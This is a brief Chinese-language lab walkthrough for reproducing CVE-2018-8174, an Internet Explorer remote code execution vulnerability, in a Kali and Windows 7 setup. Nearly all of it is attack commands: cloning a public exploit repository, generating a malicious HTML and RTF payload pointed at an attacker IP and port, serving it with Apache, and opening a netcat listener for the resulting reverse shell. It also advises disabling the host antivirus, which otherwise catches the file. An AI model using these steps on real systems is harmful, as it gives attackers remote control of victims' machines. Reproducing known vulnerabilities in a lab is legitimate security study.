漏洞介紹
CVE2018-8174這個漏洞是針對ie瀏覽器的一個遠程代碼執行漏洞
復現環境
kali
win7
復現
克隆文件
git clone https://github.com/Sch01ar/CVE-2018-8174_EXP
生成
python CVE-2018-8174.py -u http://192.168.31.117/exploit.html -o exploit.rtf -i 192.168.31.117 -p 7777
將文件移動到html下嗎,啓動apache2
/etc/init.d/apache2 start
監聽端口
nc -vlp 7777
靶機ie訪問
http://192.168.31.117/exploit.html
注:復現時關閉主機火絨,虛擬機內也會被殺;